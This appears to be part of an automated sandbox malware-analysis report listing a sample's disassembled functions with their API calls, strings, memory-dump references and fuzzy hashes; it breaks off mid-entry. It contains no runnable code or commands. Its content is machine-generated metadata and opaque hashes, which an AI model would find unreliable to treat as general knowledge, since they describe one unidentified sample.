Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8

Function 00408524 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 328
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00408529

Strings

Unknown error, xrefs: 004087EA, 004087EF
83B, xrefs: 0040881D

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID: 83B$Unknown error
API String ID: 3519838083-1944086607
Opcode ID: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
Instruction ID: d43b38567734cbd3d280cef04a8de17ccbe463ec1fdb7709e9180388f705ec22
Opcode Fuzzy Hash: 4eafd060168cf62d967f11a2e06bed2b646f89a5601815e0617f26fec8bbc86a
Instruction Fuzzy Hash: A5D17070900259EFCF05DFA4C944ADEBB74BF14318F20846EF845BB291CB78AA45CB95

Function 00408F0A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00408F0F
GetLastError.KERNEL32(?,00000003,00000003,00000003,?,?,00000000), ref: 00408FD3

Part of subcall function 00409184: __EH_prolog.LIBCMT ref: 00409189

Part of subcall function 004092E9: __EH_prolog.LIBCMT ref: 004092EE

Part of subcall function 00408A3B: __EH_prolog.LIBCMT ref: 00408A40

Strings

KA, xrefs: 00409089

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog$ErrorLast
String ID: KA
API String ID: 2901101390-4133974868
Opcode ID: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
Instruction ID: 1ffdda1e280707f1620b0bff2a1c5a648dc862d45b7bd7d33f28712355ced64d
Opcode Fuzzy Hash: b6f1e9e35d0993485aac3e7f0f886f6fddc444a62bfdbd27778ba704e600b33b
Instruction Fuzzy Hash: 7C81677190020AABCF01EFA5C885ADEBBB5BF18318F14416EF455B32A2CB399A05CB54

Function 004049DD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 004049E2
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00404A6D

Strings

KA, xrefs: 004049F6, 00404A56, 00404B4E, 00404B7E, 00404A7A, 00404B84

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ErrorH_prologLast
String ID: KA
API String ID: 1057991267-4133974868
Opcode ID: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
Instruction ID: ea88e0dbf276ed2b61ac96949af9a946984d9cda694903235269fb2a0f105987
Opcode Fuzzy Hash: 17c35cf8e9a7414348f32529b6738b26766f9c2a34e08f9ad75d03fbdc4fbc32
Instruction Fuzzy Hash: 14512671A4010A9ACF10EBA0C945AFFBB74EF91318F14017BE601732D1D779AE46CB99

Function 00401AF4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401AF9

Strings

KA, xrefs: 00401B4E
KA, xrefs: 00401BF0, 00401BF7

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID: KA$KA
API String ID: 3519838083-594506476
Opcode ID: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
Instruction ID: 3866b3b7da3d7396f9922ec017f7e66c93d936b9f161a27d318f0a0663603341
Opcode Fuzzy Hash: 5b0f55770afa12d36702e97ef3d2b3e48a7f6e08a164a6161b21258ea26ce881
Instruction Fuzzy Hash: 7451CF72D042199FDF11DFA4C940BEEBBB4AF05394F14416AE851732E2E3789E85CB68

Function 0040DD8B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040DD90

Strings

, xrefs: 0040DE57

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-3916222277
Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4

Function 00403113 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00403118

Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846

Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2

Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E

Strings

Default, xrefs: 0040322A

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID: Default
API String ID: 3519838083-753088835
Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14

Function 00402F15 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00402F1A

Part of subcall function 00403376: __EH_prolog.LIBCMT ref: 0040337B

Part of subcall function 004034E3: __EH_prolog.LIBCMT ref: 004034E8

Part of subcall function 0040309D: __EH_prolog.LIBCMT ref: 004030A2
Part of subcall function 0040309D: ShowWindow.USER32(00414BE4,00000001,000001F4,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004030FB

Part of subcall function 004131E0: CloseHandle.KERNEL32(00000000,00000000,00403035,?,?,00000000,00000003,?,00000000,?,?,00000000,00000000,00000000), ref: 004131EA
Part of subcall function 004131E0: GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 004131F4

Strings

KA, xrefs: 00403042

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog$CloseErrorHandleLastShowWindow
String ID: KA
API String ID: 2740091781-4133974868
Opcode ID: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
Instruction ID: b66072ba2aa71961cefff889ac2f3310996ab01b533407b8592e0c78779ee57e
Opcode Fuzzy Hash: 4e9039a6ef41e593bfbb802c2a04a2fdc835dade45d0606e7df40fddacf7360b
Instruction Fuzzy Hash: 2F41AF31900249DBCB11EFA5C991AEDBBB8AF14314F1480BFE906B72D2DB385B45CB55

Function 00408902 Relevance: 3.1, APIs: 2, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00408907
GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00408AEB,?,?,?,?,?,?,?,00000000), ref: 00408994

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ErrorH_prologLast
String ID:
API String ID: 1057991267-0
Opcode ID: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
Instruction ID: a8fc1237ba57e47b0ed65f04e9c7bd5e3c99de29461016f9efabf40ab0132a5b
Opcode Fuzzy Hash: 3b655691cd2a170c36ef711b3d6cea0560e4eeba85cc05aee82b2e3575fc547f
Instruction Fuzzy Hash: 3F3181B19012499FCB10DF95CA859BEBBA0FF04314B14817FE495B72A1CB388D41CB6A

Function 004051C8 Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 004051CD

Part of subcall function 0040511B: __EH_prolog.LIBCMT ref: 00405120

Part of subcall function 004058CD: __EH_prolog.LIBCMT ref: 004058D2

GetLastError.KERNEL32(?,?,?,?,00000003,?,00000000,?,00000000), ref: 0040522C

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog$ErrorLast
String ID:
API String ID: 2901101390-0
Opcode ID: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
Instruction ID: 4ca71d6396368880cce983a38ddafe9bc91d36a7a330c4fa26da9ce64be84c4d
Opcode Fuzzy Hash: d33f8126ed8318c7129a01f11b7322f40edc7a38c1873fe00e643a2a39180484
Instruction Fuzzy Hash: 43114831C00A059ACF14FBA5D4426EFBB70DF51368F1042BFA462771E28B7C1A4ACE19

Function 004159F8 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09

Part of subcall function 004158B0: GetVersionExA.KERNEL32 ref: 004158CF

HeapDestroy.KERNEL32 ref: 00415A48

Part of subcall function 00415A55: HeapAlloc.KERNEL32(00000000,00000140,00415A31,000003F8), ref: 00415A62

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
Instruction ID: d610f17f35f819288534aaa08ec9d41b03b5a17a7fe04688d897b1e7918b3c37
Opcode Fuzzy Hash: 825b9816dc88181ec874f225c5ca0d214e5516542b2a7945f872998de4828b81
Instruction Fuzzy Hash: 00F03070696A01EBDB206B715DCA7E62A949F84799F104637F540C85A0EB7884C19A1D

Function 00405ACE Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 00405AE9
GetLastError.KERNEL32(?,?,?,?), ref: 00405AF7

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
Instruction ID: ae3098a1e04470c1e0e5e0b92581544958da7485e9b3b22056b888074196ff7d
Opcode Fuzzy Hash: 76489df8c25185c5262ec68b9c2ea30a41bcc890bee3aa4ad9f45433592c2f72
Instruction Fuzzy Hash: 89F0B7B4504208EFCB14CF54D9448AE7BF9EF49350B108169F815A7390D731AE00DF69

Function 0040BBC9 Relevance: 2.0, APIs: 1, Instructions: 515COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BBCE

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
Instruction ID: 754c2283aee26f26976a66738bb4ef570e525f81dc1fbbef9a6f78583ad2e2a8
Opcode Fuzzy Hash: e20e68f67df63d5f9e9ba5d17b85cf5a5e4b904928eba79c37a56f5e811e61d3
Instruction Fuzzy Hash: 5B325D70904249DFDB10DFA8C584ADEBBB4AF58304F1441AEE855BB3C2CB78AE45CB95

Function 0040280D Relevance: 1.9, APIs: 1, Instructions: 384COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402812

Part of subcall function 00402D80: EnterCriticalSection.KERNEL32(?,?,?,004095B9), ref: 00402D85
Part of subcall function 00402D80: LeaveCriticalSection.KERNEL32(?,?,?,?,004095B9), ref: 00402D8F

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: CriticalSection$EnterH_prologLeave
String ID:
API String ID: 367238759-0
Opcode ID: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
Instruction ID: 6b86c84e82b28a82bfdc9d9b9477fa58d6923614df4f06b31c284573bb568367
Opcode Fuzzy Hash: 71e1dc36bd9d06b7d898947adcd583decfbfe7f4f6cc64154346a2ad7b3dab8a
Instruction Fuzzy Hash: 14F1AD30900249DFCF14EFA5C989ADEBBB4AF54318F14806EE445B72E2DB789A45CF19

Function 00408A3B Relevance: 1.9, APIs: 1, Instructions: 374COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408A40

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55

Function 0040EA0B Relevance: 1.8, APIs: 1, Instructions: 255COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040EA10

Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d5330e640343d25a8eedcdb33eba9a98cecc4117f45ccf2878744254283c26ce
Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
Opcode Fuzzy Hash: d5330e640343d25a8eedcdb33eba9a98cecc4117f45ccf2878744254283c26ce
Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65

Function 0040F648 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F64D

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1bd80e4fd0229361987f9fd3b275e1f8f365478e336be0a9cb425272782c87b8
Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
Opcode Fuzzy Hash: 1bd80e4fd0229361987f9fd3b275e1f8f365478e336be0a9cb425272782c87b8
Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99

Function 0040CFAD Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CFB2

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2968991896.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969225688.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969353072.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969505815.0000000000422000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969621162.0000000000423000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2969744432.0000000000427000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9SPLMMrYRskiaGUcrT9MofKl.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 63c8e573d396fc96efa94e1a42408f9b291e1898eda9953334360b92db0a26c8
Instruction ID: 9f9062e63dd4364452e2da1ca70528b8602d2a0ea6fe4ab8d483929f8703c9bd
Opcode Fuzzy Hash: 63c8e573d396fc96efa94e1a42408f9b291e1898eda9953334360b92db0a26c8
Instruction Fuzzy Hash: 69518C31C04145DBCB15DFA8C884EAA7B71AF45308F1880BBE4157F2D2DA399A4EDB5D

Function 0040C783 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040C788

Memory Dump Source

Source File: 00000007.00000002.2969095822.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

